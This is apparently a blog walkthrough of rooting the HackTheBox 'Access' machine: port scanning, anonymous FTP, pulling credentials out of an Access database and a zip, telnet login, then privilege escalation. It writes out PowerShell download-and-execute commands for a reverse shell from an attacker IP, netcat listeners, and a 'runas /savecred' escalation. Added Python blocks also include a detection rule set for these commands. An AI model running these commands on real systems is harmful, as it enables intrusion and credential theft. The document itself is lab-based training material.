[HTB] SHELL AFFECT - Access - WriteUp

ctf
tutorial
pentesting
hacking
networking

Hey buddies!
How are you doing?

This time I will show you how to root the ‘Access’ VM from HackTheBox.
Like other topics, I will focus on the methodology and the steps which were required to root the box on your own successfully.

Table of contents

1. Port scanning
2. Port filtering
3. Service enumeration
4. FTP
5. Telnet
6. HTTP
7. Analyse Microsoft Access Database
8. ZIP File extraction
9. Telnet Login
10. Reverse Shell through PowerShell
11. Local enumeration
12. Privilege Escalation
13. Challenge

Let’s begin.

1. Ping & Port Scanning

As always, I like to start by scanning the machine for open ports. We need an overview of our target. Because we don’t know how the target is configured, we should take small steps. So let us ping the machine first.

ping -c 3 10.10.10.98


Notice the TTL (Time-To-Live) is 127. But what is TTL?
Do some research and try to find out on your own.
You should practice it!

When you find the information you need, then you can go forward.
But what do we need to know?

This is a great question, and to become better it’s necessary to be able to find the solution on your own. So take a step back and create an overview for yourself. Also, you should ask yourself:
What do I need?
What is my goal (for this part!)?

It’s always easy if you see the solution. Every machine looks pretty easy if you know how to root it. The most difficult part of it is to find a way into it on your own.
So do some research before you continue.


Some useful resources you should find are:

Now we know that the OS is most likely a Windows.

Let us enumerate the open ports of this machine by using Nmap.
If you’re not familiar with Nmap, you should do some research. It is an essential tool which most penetration testers use.

Resource: https://nmap.org/

nmap 10.10.10.98 -Pn -n -p- --open -oN allports.nmap --stats-every 30s --max-retries 2 -T5

Alright, what do we have so far?

  • OS: Windows (most likely)
  • FTP
  • Telnet
  • HTTP

2. Port filtering

It’s possible that you will discover much more open ports on other machines and it could be a pain to type them manually.
Let us filter these by using Bash.

cat allports.nmap | grep tcp | cut -d"/" -f1 | tr "\n" "," | sed 's/.$//g'

If you don’t understand the command, you can visit this site to get a better understanding of it: https://explainshell.com/

Now we can save the output of it in a variable.

PORTS=$(cat allports.nmap | grep tcp | cut -d"/" -f1 | tr "\n" "," | sed 's/.$//g')

To verify it looks great, we should ‘echo’ it.

echo $PORTS

And now we can proceed.
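The Bash pipeline above does the job, but a `grep tcp` will also match any other line that happens to contain “tcp” (for example the header line that records the scan command). As an added example that is not part of the original post, here is the same port extraction done in Python with a strict match on the `PORT/PROTO STATE` line format of nmap’s `-oN` output. The sample file contents are constructed for illustration and are not the real allports.nmap from the box; it also lets you pick the states you want (the `--open` flag in the scan above already limits the output to open ports).

```python
import re

# Constructed sample of an nmap -oN (normal output) file for illustration;
# this is NOT the real allports.nmap produced against the box.
SAMPLE_ALLPORTS_NMAP = """\
# Nmap 7.70 scan initiated Sat Jan 26 12:00:00 2019 as: nmap 10.10.10.98 -Pn -n -p- --open -oN allports.nmap
Nmap scan report for 10.10.10.98
Host is up (0.030s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet
80/tcp open  http

# Nmap done at Sat Jan 26 12:05:00 2019 -- 1 IP address (1 host up) scanned in 300.00 seconds
"""

# Matches only real port lines such as "21/tcp open  ftp" or
# "53/udp open|filtered domain"; header and comment lines never match.
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)")


def extract_ports(nmap_text, states=("open",), proto="tcp"):
    """Return the sorted, de-duplicated port numbers from nmap normal output
    whose protocol is `proto` and whose state is one of `states`."""
    ports = set()
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, line_proto, state = int(m.group(1)), m.group(2), m.group(3)
        if line_proto == proto and state in states:
            ports.add(port)
    return sorted(ports)


def ports_for_nmap(ports):
    """Join port numbers into the comma-separated form nmap's -p flag expects,
    with no trailing comma (what the sed 's/.$//g' step above removes)."""
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    open_ports = extract_ports(SAMPLE_ALLPORTS_NMAP)
    # Equivalent of: PORTS=$(...); echo $PORTS
    print(ports_for_nmap(open_ports))
```

Run it and paste the printed list into `-p` for the service scan, exactly as with the `$PORTS` variable above. Passing `states=("open", "filtered")` shows how a scan without `--open` would be handled.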

3. Service enumeration

Service enumeration is the part where we try to find out more information about the running services. Enumeration doesn’t mean only collecting as much information as possible; you also have to build an overview from all the information you have received.

Let us use Nmap for service scan and the Nmap Scripting Engine (NSE) to collect more information about the running services.

nmap 10.10.10.98 -p$PORTS -sV -sC -oN services.nmap --stats-every 30s --max-retries 2

So here is what our results look like:

Look at the information we’ve got so far closely.
Every information in this result is crucial for us.
You should append the info we just found out to our previous overview.

You also should notice the Telnet line. Take a closer look at it. What exactly do you see there?

There is a question mark. Right. What could this mean?
[Important] Train your research skills and try to find it out on your own.

Sometimes it can be essential to search for information like this little thing.

4. FTP

Let us take a look at the FTP server. You should notice from the previous Nmap scan that we have ‘Anonymous login allowed’. So let’s use it.

ftp 10.10.10.98

Credentials:
Name: anonymous
Password: anon


By looking into these directories, we found some interesting files.


Now we have to download them. I will show you two different methods to do it.
We can use FTP with the ‘get’ command, or we can use ‘wget’ to download these files.
But first, we have to stay organised. So we create an FTP directory where we will store the files.

GET command


WGET

You should read the manual of ‘wget’ to understand the command and find out what PASV mode of an FTP server is.

Before we begin to analyse the files let us enumerate the other services too.

5. Telnet

Did you find out what the question mark means?
Now we will take a look at this service by using telnet.

telnet 10.10.10.98


You will notice that it will take a few seconds before the login prompt appears.
That is the reason for the question mark in the Nmap scan. Nmap couldn’t positively identify this service as Telnet because the response took too long. But because Telnet normally runs on TCP port 23, it reported that it is probably Telnet.

We don’t have any credentials to log in yet, and starting to bruteforce this service just doesn’t make sense without any information about the ‘organisation’ or the machine we are trying to root. If we don’t find any useful information, then we can try to bruteforce it, but for now let us take a look at the Web server.

6. HTTP

First, we should just interact with the Web server. Let us visit it.

Here we can download the image for later analysis.
Also, we want to know what the response headers look like. Which ‘OPTIONS’ are allowed?
The questions you should ask yourself:

  • Are there some security headers?
  • What kind of security headers exists?

Again, train your research skills and learn new things. Use all search engines and methods you know to find out the information you don’t know.
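To make the two questions above concrete, here is an added example (not from the original post) that takes a raw HTTP response header block, such as the one you see in Burp or with `curl -I`, and reports which of the common security headers are absent, which methods the `Allow` header advertises, and which headers disclose software versions. The two response samples are constructed for illustration and are not captures from the box; the header names are the real ones browsers honour.

```python
# Constructed sample responses for illustration; not captured from the box.
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html
Server: ExampleServer/1.0
X-Powered-By: ASP.NET
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 1234
"""

HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer
"""

# Security headers a hardened web server is expected to send, with the
# risk each one addresses.
EXPECTED_SECURITY_HEADERS = {
    "strict-transport-security": "forces HTTPS (only meaningful once TLS is in place)",
    "content-security-policy": "restricts where scripts and resources may load from",
    "x-frame-options": "mitigates clickjacking",
    "x-content-type-options": "stops MIME sniffing (nosniff)",
    "referrer-policy": "limits Referer leakage to third parties",
}

# Methods that should normally not be enabled on a production web server.
RISKY_METHODS = {"TRACE", "PUT", "DELETE"}

# Headers that disclose the software stack to anyone who asks.
DISCLOSING_HEADERS = ("server", "x-powered-by")


def parse_headers(raw):
    """Split a raw response into (status line, {lowercase name: value})."""
    lines = raw.splitlines()
    status = lines[0].strip()
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def audit_headers(raw):
    """Return the missing security headers, risky methods advertised in
    Allow, and version-disclosing headers found in the response."""
    _, headers = parse_headers(raw)
    missing = sorted(h for h in EXPECTED_SECURITY_HEADERS if h not in headers)
    allowed = [m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()]
    risky = sorted(m for m in allowed if m in RISKY_METHODS)
    disclosing = sorted(h for h in DISCLOSING_HEADERS if h in headers)
    return {"missing": missing, "risky_methods": risky, "disclosing": disclosing}


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        result = audit_headers(raw)
        print(label)
        for name in result["missing"]:
            print("  missing:", name, "->", EXPECTED_SECURITY_HEADERS[name])
        print("  risky methods:", result["risky_methods"])
        print("  disclosing headers:", result["disclosing"])
```

Note this into your overview like everything else: a server that sends none of these headers and advertises TRACE tells you something about how much attention its configuration received.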

From this point, we want to spider the Web server to find out which directories on it exist.
Therefore we will use Burp Suite.
After setting up our proxy settings and configuring our target in Burp, we can send another GET request to the Web server and intercept it. By sending it to Spider in Burp, it will hopefully find some useful files or directories.

By clicking on Action you can send the request to Spider in Burp.
Burp Spider is a crawler which is used to map a Web server.

Looking at our results, we don’t have much here:

From here we can make another step and bruteforce the Web server with GET requests for different files and directories. There exist a lot of tools out there like gobuster, dirbuster, dirb and dirsearch.
In this example, I will use dirsearch. It isn’t installed in Kali Linux by default.
So here is the resource for dirsearch where you can download it.

You can download it by using the following command:

git clone https://github.com/maurosoria/dirsearch.git /opt/dirsearch/

Also, to make it globally executable you can create a symbolic link to /usr/local/bin/ .

ln -s /opt/dirsearch/dirsearch.py /usr/local/bin/dirsearch

By typing:

dirsearch -h

you will see all the options it has. Now let us enumerate the Web server with it.

dirsearch -u http://10.10.10.98 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10 --max-retries=2 -e html,jpg,png,xml,aspx,asp,htm,asmx,dll,db

Unfortunately, there is nothing interesting on the Web server. Another tool we can use is nikto.
This will provide us with a lot of information:


You should always note all of the information we collected so far during the process.

Let’s move on.

7. Microsoft Access Database

At this point, we should determine the file types of the files we are working with.
This could be done with a tool called ‘file’.

file Access\ Control.zip
file backup.mdb


Another method to find more information is ‘exiftool’.

Access Control.zip


backup.mdb


Notice that ‘exiftool’ couldn’t determine the file type. So we have to do it manually.

Ok Google: mdb file

On the first result page, you will be able to find this URL: https://fileinfo.com/extension/mdb
It provides us with the information we need.

I can’t repeat it often enough: note it!

Another question:

Ok, Google: extract mdb data kali

Here you will find a website called http://mdbtools.sourceforge.net/install/x53.htm.

By using ‘mdbtools’ we can work with this file. Let us take a look at what it looks like inside.

mdb-tables backup.mdb


Ok. We have to structure it to make it easily readable.

We see the auth_user table inside. Let’s export the data from this table.

mdb-export backup.mdb auth_user | tr "," " " | grep "\"" | cut -d" " -f2-3 | sed 's/\"//g' | tr " " ":"

Also, we should save this information.

mdb-export backup.mdb auth_user | tr "," " " | grep "\"" | cut -d" " -f2-3 | sed 's/\"//g' | tr " " ":" > creds.txt

Another way we can use is the following:

mdb-export backup.mdb auth_user | tr "," " " | column -t
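The `tr "," " " | cut -d" " -f2-3` pipeline above silently breaks as soon as a username or password contains a space or a comma, because it splits on both. As an added example that is not part of the original post, here is the same extraction done with Python’s csv module, which understands the quoting mdb-export emits. The table rows below are constructed placeholders, not the contents of backup.mdb, and the column names `username` and `password` are assumptions you should check against the header line mdb-export prints.

```python
import csv
from io import StringIO

# Constructed sample of mdb-export output; the rows are placeholders and
# NOT the real contents of backup.mdb. Note the second and third rows have
# a space and a comma inside the quoted password field.
SAMPLE_MDB_EXPORT = """\
id,username,password,Status,last_login,RoleID,Remark
1,"example_engineer","ExamplePass1",1,"01/01/19 10:00:00",2,
2,"example_backup","Example Pass2",1,"01/01/19 10:05:00",2,
3,"example_admin","Example,Pass3",1,"01/01/19 10:10:00",2,
"""


def credentials_from_export(export_text, user_col="username", pass_col="password"):
    """Parse mdb-export CSV text and return a list of 'user:pass' strings.

    csv.DictReader honours the double quotes mdb-export puts around text
    fields, so spaces and commas inside a value stay part of that value.
    The column names default to 'username'/'password' (an assumption);
    pass the real ones from the header line if they differ.
    """
    reader = csv.DictReader(StringIO(export_text))
    creds = []
    for row in reader:
        user = (row.get(user_col) or "").strip()
        pwd = (row.get(pass_col) or "").strip()
        if user and pwd:                  # skip rows with an empty field
            creds.append(f"{user}:{pwd}")
    return creds


def write_creds(creds, path="creds.txt"):
    """Save the pairs one per line, the same layout as the shell version."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(creds) + "\n")
    return path


if __name__ == "__main__":
    # In practice feed it the real output: mdb-export backup.mdb auth_user
    for pair in credentials_from_export(SAMPLE_MDB_EXPORT):
        print(pair)
```

Against the constructed rows the shell pipeline would turn `Example Pass2` into two fields and lose `Pass3` entirely; the csv version keeps both intact. It is still a good habit to eyeball the output with `column -t` as shown above before you rely on it.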

8. ZIP File extraction

Next file is our ZIP archive. We want to know what’s inside of it.

unzip Access\ Control.zip


Do some research. Find out why this error appears.

7z e Access\ Control.zip

Now it’s asking us for a password. Did we find some credentials already?
Let us try to use them:


We extracted a file called ‘Access Control.pst’. What kind of file is it?

file Access\ Control.pst


Find out a way on your own to read the content.

cat 'Access Control.mbox' | head -n 25

9. Telnet Login

At this point, we found other credentials which we can use.
Let us try to log in by using these.

telnet 10.10.10.98

We could successfully log in by using the credentials we found from the ZIP file.
Now it’s time for local enumeration, but first, it’s always better to work with a reverse shell.

Make sure you understand how a reverse shell works because it’s an essential part in this whole area.

10. Reverse Shell through PowerShell

But before we can obtain a reverse shell we have to plan it, understand how it should work and what the whole scenario will look like.
We have to make our target connect back to us. (cough) firewalls (cough)

What do we need:

  1. Reverse shell script
  2. Web server
  3. Listener
  4. Execution command

1. Reverse shell Script

Nishang created an excellent collection of different PowerShell scripts. One of these we will use to obtain our reverse shell. We will copy it to our working directory.

We want to make sure that our target machine will execute it directly. Here we have to make some changes for that. By looking into the reverse shell script, we will see an example:

We will copy this line to the end of the file and remove the "PS >". After these changes it will look like this:


2. Web server

There exist a lot of methods to share files. We will use this time a Python3 Web server module in the directory we stored our script.

python3 -m http.server 80

3. Listener

After that, we have to start our listener and listen on the port we set in the script before. In my case, it was the TCP port 2201. Therefore I will use Netcat.

nc -nlvp 2201

4. Execution command

The execution command for this will be:

C:\Users\security> powershell -c IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/revshell.ps1')

11. Local enumeration

411Hall created an awesome enumeration PowerShell script called JAWS to identify privilege escalation vectors quickly.
We will let our target system download and execute it the same way we did it with the reverse shell.

It will take a few minutes. So don’t quit the session.
The most interesting part is this one:


Also, let us take a look at the desktop of the ‘security’ user.

So it seems we have here some stored credentials for the Administrator on this machine.
If we don’t know how to export them what else could we do?

12. Privilege Escalation

Let us ask Google:

Ok, Google: windows currently stored credentials privilege escalation

Also here on the first page, you will find a GitHub repository of swisskyrepo to his Windows - Privilege Escalation cheat sheet.
If you press CTRL+F and search for “stored credentials”, you will see this example:


Ok. Do we need an EXE file or can we do something else?

What do you think about another reverse shell but this time with Administrator privileges?

Go back to 10. Reverse Shell through PowerShell if you don’t know how it works or what it should look like. But I think this should be clear by now. It’s the same scenario in this situation.

  1. We will just change the TCP port of our reverse shell script to 2202.
  2. Run our python web server.
  3. Set up our listener on TCP port 2202.
  4. Execute it the same way with PowerShell with the currently stored credentials.

1. Reverse Shell Script


2. Web server

python3 -m http.server 80

3. Listener

nc -nlvp 2202

4. Execution command

PS C:\Users\security> runas /savecred /user:ACCESS\Administrator "powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/revshell.ps1')"
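Both execution commands in sections 10 and 12 leave the same footprint in process-creation telemetry: a PowerShell download cradle (`IEX` plus `DownloadString`) and, for the escalation, `runas /savecred`. As an added example that is not part of the original post, here is the detection side of that picture: a small rule set run over constructed process-creation records (the shape a Sysmon Event ID 1 or Security 4688 pipeline would hand to a detection engine). The records are built from the command lines shown above and are not real telemetry; the rule names are my own.

```python
import re

# Constructed process-creation records built from the command lines in the
# write-up; NOT real telemetry from the box.
SAMPLE_EVENTS = [
    {"user": "ACCESS\\security", "image": "powershell.exe",
     "cmdline": "powershell -c IEX(New-Object Net.WebClient)"
                ".downloadString('http://10.10.14.5/revshell.ps1')"},
    {"user": "ACCESS\\security", "image": "runas.exe",
     "cmdline": "runas /savecred /user:ACCESS\\Administrator "
                "\"powershell.exe IEX(New-Object Net.WebClient)"
                ".downloadString('http://10.10.14.5/revshell.ps1')\""},
    # Benign PowerShell use, included so the rules have something to ignore.
    {"user": "ACCESS\\security", "image": "powershell.exe",
     "cmdline": "powershell -c Get-ChildItem C:\\Users\\security\\Desktop"},
]

# Rule names are illustrative (assumed, not from any product). Each regex is
# case-insensitive because PowerShell itself is.
RULES = [
    # Invoke-Expression / IEX fed by a web download: the classic cradle.
    ("ps_download_cradle",
     re.compile(r"(?i)\b(IEX|Invoke-Expression)\b.*(DownloadString|DownloadFile)\s*\(")),
    # runas with /savecred reuses credentials stored in Credential Manager.
    ("runas_savecred",
     re.compile(r"(?i)\brunas(\.exe)?\b.*/savecred")),
    # Net.WebClient in a command line is worth a look on its own.
    ("net_webclient",
     re.compile(r"(?i)Net\.WebClient")),
]


def classify(event):
    """Return the names of all rules whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(event["cmdline"])]


def detect(events):
    """Return (user, image, rule names) for every event that hits a rule;
    events matching nothing are dropped."""
    findings = []
    for event in events:
        hits = classify(event)
        if hits:
            findings.append((event["user"], event["image"], hits))
    return findings


if __name__ == "__main__":
    for user, image, hits in detect(SAMPLE_EVENTS):
        print(f"{user:20} {image:16} {', '.join(hits)}")
```

The second record is the one a defender cares about most: a non-administrative account invoking `runas /savecred` for the Administrator account and a download cradle in the same command line. Stored credentials that a low-privileged user can replay this way are exactly the misconfiguration this box is built around, and this is the kind of event that should page someone.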

13. Challenge

For this challenge, your goals will be

  1. A Meterpreter session
  2. Upload Mimikatz and read the credentials

Restrictions:

  1. The usage of Empire or their scripts for this challenge is forbidden.

Have fun!


YouTube video coming soon!

Best regards,
Cry0l1t3

Official Website: https://www.shell-affect.com
Twitter: https://twitter.com/ShellAffect
Xing: https://www.xing.com/companies/shell-affect
YouTube: https://www.youtube.com/channel/UCgxyvJCaG1vRLM2GIpyBiWQ
